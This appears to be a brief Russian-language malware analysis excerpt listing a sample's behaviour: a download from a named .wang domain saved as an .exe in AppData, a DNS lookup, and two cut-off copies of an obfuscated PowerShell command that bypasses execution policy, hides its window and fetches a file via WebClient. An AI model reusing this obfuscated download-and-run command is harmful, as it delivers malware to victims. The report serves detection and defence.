Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwE^RsHeLL.exe ^-^eX^E^c^U^T^i^On^pOl^ICY bYPA^S^S^ -NO^p^ROf^ILe -WI^nd^O^w^sT^YLE ^h^I^Dd^En^ (^nE^w^-^oBje^CT s^yste^M.^NEt.^webCLIEnT).dow^nlOa^DF^ile(^'http://bestflow...
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /c "pOwE^RsHeLL.exe ^-^eX^E^c^U^T^i^On^pOl^ICY bYPA^S^S^ -NO^p^ROf^ILe -WI^nd^O^w^sT^YLE ^h^I^Dd^En^ (^nE^w^-^oBje^CT s^yste^M.^NEt.^webCLIEnT).dow^nlOa^DF^ile(^'http://bestflow...' (со скрытым окном)